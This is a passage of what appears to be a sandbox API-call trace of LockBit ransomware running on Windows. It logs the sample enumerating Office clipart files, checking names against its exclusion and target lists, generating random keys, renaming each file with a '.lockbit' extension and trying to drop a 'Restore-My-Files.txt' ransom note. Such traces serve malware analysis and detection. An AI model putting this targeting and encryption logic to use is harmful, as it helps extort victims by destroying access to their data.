ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107658.WMF", cAlternateFileName="")) returned 1 [0142.094] lstrcmpiW (lpString1=".", lpString2="J0107658.WMF") returned -1 [0142.094] lstrcmpiW (lpString1="..", lpString2="J0107658.WMF") returned -1 [0142.094] PathFindExtensionW (pszPath="J0107658.WMF") returned=".WMF" [0142.094] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.094] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.094] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.094] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.095] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.095] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.096] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107658.WMF") returned 1 [0142.096] lstrcmpiW (lpString1="ntldr", lpString2="J0107658.WMF") returned 1 [0142.096] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107658.WMF") returned 1 [0142.097] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107658.WMF") returned -1 [0142.097] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107658.WMF") returned -1 [0142.097] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107658.WMF") returned 1 [0142.097] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107658.WMF") returned -1 [0142.097] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.097] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned=".WMF" [0142.097] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.097] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.097] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.098] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.098] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF.lockbit") returned 72 [0142.098] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107658.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0142.099] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.099] malloc (_Size=0x40068) returned 0x3ef0008 [0142.099] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=7072) returned 1 [0142.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.099] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0142.100] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0142.100] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0142.105] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.105] malloc (_Size=0xa6) returned 0x77d7a8 [0142.105] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.106] free (_Block=0x77d7a8) [0142.106] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.106] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.106] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.106] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65edb1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x12c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107708.WMF", cAlternateFileName="")) returned 1 [0142.106] lstrcmpiW (lpString1=".", lpString2="J0107708.WMF") returned -1 [0142.107] lstrcmpiW (lpString1="..", lpString2="J0107708.WMF") returned -1 [0142.107] PathFindExtensionW (pszPath="J0107708.WMF") returned=".WMF" [0142.107] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.107] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.108] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.108] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107708.WMF") returned 1 [0142.108] lstrcmpiW (lpString1="ntldr", lpString2="J0107708.WMF") returned 1 [0142.108] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107708.WMF") returned 1 [0142.108] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107708.WMF") returned -1 [0142.108] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107708.WMF") returned -1 [0142.108] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107708.WMF") returned 1 [0142.108] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107708.WMF") returned -1 [0142.108] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.109] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned=".WMF" [0142.109] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.109] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.109] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.109] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF.lockbit") returned 72 [0142.109] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107708.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0142.114] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.115] malloc (_Size=0x40068) returned 0x1ff1e60 [0142.115] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4808) returned 1 [0142.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.115] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0142.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.115] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0142.116] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.118] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.118] malloc (_Size=0xa6) returned 0x77d7a8 [0142.118] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.119] free (_Block=0x77d7a8) [0142.119] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.119] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.119] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.119] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65edb1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x121c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107712.WMF", cAlternateFileName="")) returned 1 [0142.119] lstrcmpiW (lpString1=".", lpString2="J0107712.WMF") returned -1 [0142.119] lstrcmpiW (lpString1="..", lpString2="J0107712.WMF") returned -1 [0142.119] PathFindExtensionW (pszPath="J0107712.WMF") returned=".WMF" [0142.119] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.119] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.119] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.119] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.119] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.119] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.119] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.119] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.119] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.119] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.120] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.120] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107712.WMF") returned 1 [0142.121] lstrcmpiW (lpString1="ntldr", lpString2="J0107712.WMF") returned 1 [0142.121] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107712.WMF") returned 1 [0142.121] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107712.WMF") returned -1 [0142.121] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107712.WMF") returned -1 [0142.121] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107712.WMF") returned 1 [0142.121] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107712.WMF") returned -1 [0142.121] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.121] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned=".WMF" [0142.121] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.121] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.121] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 